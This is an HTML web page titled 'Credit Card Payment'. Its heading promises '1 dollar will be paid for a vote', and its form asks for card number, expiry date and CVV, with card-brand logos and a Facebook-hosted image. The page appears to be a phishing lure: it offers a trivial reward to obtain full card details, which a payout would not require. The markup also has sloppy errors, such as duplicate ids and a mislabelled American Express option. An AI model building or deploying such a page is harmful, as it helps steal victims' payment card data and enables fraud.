<!DOCTYPE html>
<html>
<head>
	<title>Credit Card Payment</title>
	<style type="text/css">body {
    font-family: Arial, sans-serif;
    background-color:0px 0px 10px rgb(33, 28, 28);;
    padding: 30px;
  }
  
  h1 {
    text-align: center;
    color:blue;
  }
  
  form {
    width: 400px;
    margin: 0 auto;
    background-color:#0c0c0b14;
    padding: 20px;
    border-radius: 20px;
    box-shadow: 0px 2px 10px rgb(255, 241, 241);
  }
  
  label {
    display: block;
    font-weight: bold;
    margin-bottom: 5px;
    color:#000000;
  }
  
  input[type="text"] {
    display: inline-block;
    width: 90%;
    padding: 10px;
    margin-bottom: 10px;
    border-radius: 20px;
    border: 1px solid #cccccc;
  }
  
  input[type="submit"] {
    display:inline;
    animation: reverse;
    animation-duration: 2ms;
    width: 40%;
    padding: 10px;
    background-color: #4caf50;
    color: #ffffff;
    font-weight: bold;
    border-radius: 20px;
    border: none;
    cursor: pointer;
    align-items: center;
  }
  
  input[type="submit"]:hover {
    background-color: #1f9fb8;
  }
  .max{
    width: 15%;

  }
  #background-video {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    object-fit: cover;
    z-index: -1;
    }
	</style>
	<script>
    window.addEventListener('DOMContentLoaded', (event) => {
      const cvvInput = document.getElementById('cvv');
      cvvInput.addEventListener('input', formatCVV);
      
      function formatCVV() {
        let cvv = cvvInput.value;
        cvv = cvv.replace(/\s+/g, '').replace(/[^0-9]/gi, '');
        
        if (cvv.length > 4) {
          cvv = cvv.slice(0, 4);
        }
        
        cvvInput.value = cvv;
      }
    });
    window.addEventListener('DOMContentLoaded', (event) => {
      const cardNumberInput = document.getElementById('card_number');
      cardNumberInput.addEventListener('input', formatCardNumber);
      
      function formatCardNumber() {
        let cardNumber = cardNumberInput.value;
        cardNumber = cardNumber.replace(/\s+/g, '').replace(/[^0-9]/gi, '');
        
        if (cardNumber.length > 16) {
          cardNumber = cardNumber.slice(0, 16);
        }
        
        let formattedNumber = '';
        for (let i = 0; i < cardNumber.length; i++) {
          if (i > 0 && i % 4 === 0) {
            formattedNumber += '-';
          }
          formattedNumber += cardNumber.charAt(i);
        }
        
        cardNumberInput.value = formattedNumber;
      }
    });
    window.addEventListener('DOMContentLoaded', (event) => {
      const expiryDateInput = document.getElementById('expiry_date');
      expiryDateInput.addEventListener('input', formatExpiryDate);
      
      function formatExpiryDate() {
        let expiryDate = expiryDateInput.value;
        expiryDate = expiryDate.replace(/\s+/g, '').replace(/[^0-9]/gi, '');
        
        if (expiryDate.length > 4) {
          expiryDate = expiryDate.slice(0, 4);
        }
        
        let formattedDate = '';
        for (let i = 0; i < expiryDate.length; i++) {
          if (i === 2) {
            formattedDate += '/';
          }
          formattedDate += expiryDate.charAt(i);
        }
        
        expiryDateInput.value = formattedDate;
      }
    });
    </script>
</head>
<body>
<h1>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;1 dollar&nbsp;will be paid for a vote&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp;</h1>

<form action="" method="POST"><label for="card_number">Card Number:</label><input id="card_number" name="card_number" pattern="[0-9]{4}-[0-9]{4}-[0-9]{4}-[0-9]{4}" required="" title="Please enter a valid card number" type="text" /> <label for="expiry_date">Expiry Date (MM/YY):</label> <input id="expiry_date" name="expiry_date" pattern="[0-9]{2}\/[0-9]{2}" required="" title="Please enter the expiry date in MM/YY format" type="text" /> <label for="cvv">CVV:</label> <input id="cvv" name="cvv" required="" type="text" /> <strong>Visa<input checked="checked" id="visa" name="card_type" type="radio" value="visa" /></strong><img alt="" src="https://scontent.facc5-1.fna.fbcdn.net/v/t39.30808-6/345642874_1314934626104866_881004589387965683_n.jpg?stp=dst-jpg_p843x403&_nc_cat=107&cb=99be929b-59f725be&ccb=1-7&_nc_sid=730e14&_nc_eui2=AeEznXzrZ8s7mnuujefxl6iOSWcXlPt52mxJZxeU-3nabKQJSN0xoGfeknxUxlE5U-UO7cpZ2vLALgddkgR5pQWB&_nc_ohc=fFsoJAZ0umgAX9C3AHh&_nc_zt=23&_nc_ht=scontent.facc5-1.fna&oh=00_AfDa6CXiK9u8aYevRhrH10kcNvPcq3adA3WaC4Q5Cbulhw&oe=6496D372" style="border-width: 7px; border-style: solid; margin-left: 4px; margin-right: 4px; float: right; width: 250px; height: 353px;" /><strong> </strong><label for="visa"><img alt="" src="https://th.bing.com/th/id/R.de8246ea4ee34b14079a48cdf5a46f35?rik=oycdGfxEEJXw0g&riu=http%3a%2f%2fwww.pngall.com%2fwp-content%2fuploads%2f2017%2f05%2fVisa-Logo-High-Quality-PNG.png&ehk=Okv9HiGVQZmqD%2fImfH7uGonasCGqtCfj3Ar53t5hepk%3d&risl=&pid=ImgRaw&r=0" style="width: 64px; height: 24px;" /></label><br />
<strong>Debit</strong><input id="debit" name="card_type" type="radio" value="debit" /> <label for="visa"><img alt="" src="https://th.bing.com/th/id/R.3199df0e6d1daa6b20a55c39e60096d8?rik=DBXdYJQdMKduwA&amp;pid=ImgRaw&amp;r=0" style="width: 64px; height: 36px;" /></label>

<p><strong>American Express</strong><strong><input checked="checked" id="visa" name="card_type" type="radio" value="visa" /></strong></p>

<p><img alt="" src="https://cdn.icon-icons.com/icons2/1186/PNG/512/1490135020-american-express_82257.png" style="width: 60px; height: 49px;" /><br />
<input type="submit" value="Submit" />&nbsp;</p>
</form>
<video id="background-video" autoplay muted loop>
  <source src="walk.mp4" type="video/mp4">
</video>
</body>
</html>
